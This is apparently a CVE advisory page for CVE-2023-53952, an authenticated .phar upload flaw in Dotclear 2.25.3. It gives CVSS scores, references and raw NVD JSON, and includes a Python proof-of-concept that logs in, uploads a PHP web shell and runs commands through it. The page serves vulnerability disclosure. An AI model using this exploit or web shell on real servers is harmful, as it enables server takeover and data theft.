CVE-2023-53952

Description

Dotclear 2.25.3 contains a remote code execution vulnerability that allows authenticated attackers to upload malicious PHP files with .phar extension through the blog post creation interface. Attackers can upload files containing PHP system commands that execute when the uploaded file is accessed, enabling arbitrary code execution on the server.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:dotclear:dotclear:2.25.3:*:*:*:*:*:*:* - VULNERABLE

Dotclear < 2.25.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2023-53952 Dotclear RCE PoC
# Target: Dotclear <= 2.25.3
# Author: VulnCheck

TARGET = sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:8080'
USERNAME = sys.argv[2] if len(sys.argv) > 2 else 'attacker'
PASSWORD = sys.argv[3] if len(sys.argv) > 3 else 'password123'

session = requests.Session()

# Step 1: Login to Dotclear
login_url = f'{TARGET}/auth'
login_data = {'user_id': USERNAME, 'user_pwd': PASSWORD}
resp = session.post(login_url, data=login_data)

# Step 2: Upload malicious .phar file via blog post
upload_url = f'{TARGET}/admin/post'

# PHP payload for RCE
php_payload = '<?php system($_GET["cmd"]); ?>'

files = {
    'media_file': ('shell.phar', php_payload, 'application/octet-stream')
}

post_data = {
    'post_title': 'Malicious Post',
    'post_content': '[media upload=shell.phar]',
    'do': 'save'
}

resp = session.post(upload_url, data=post_data, files=files)

# Step 3: Execute commands via uploaded .phar file
if resp.status_code == 200:
    rce_url = f'{TARGET}/public/shell.phar?cmd=whoami'
    rce_resp = session.get(rce_url)
    print(f'Command output: {rce_resp.text}')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-53952
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-53952
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-53952/
[4] VulDB https://vuldb.com/cve/CVE-2023-53952
[5] https://dotclear.org/
[6] https://www.exploit-db.com/exploits/51353
[7] https://www.vulncheck.com/advisories/dotclear-authenticated-remote-code-execution-via-file-upload

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-53952", "sourceIdentifier": "[email protected]", "published": "2025-12-19T21:15:51.420", "lastModified": "2025-12-24T16:57:35.790", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dotclear 2.25.3 contains a remote code execution vulnerability that allows authenticated attackers to upload malicious PHP files with .phar extension through the blog post creation interface. Attackers can upload files containing PHP system commands that execute when the uploaded file is accessed, enabling arbitrary code execution on the server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dotclear:dotclear:2.25.3:*:*:*:*:*:*:*", "matchCriteriaId": "8A9CBB05-BC68-4170-A8C6-1A193D10A2B9"}]}]}], "references": [{"url": "https://dotclear.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51353", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/dotclear-authenticated-remote-code-execution-via-file-upload", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}]}}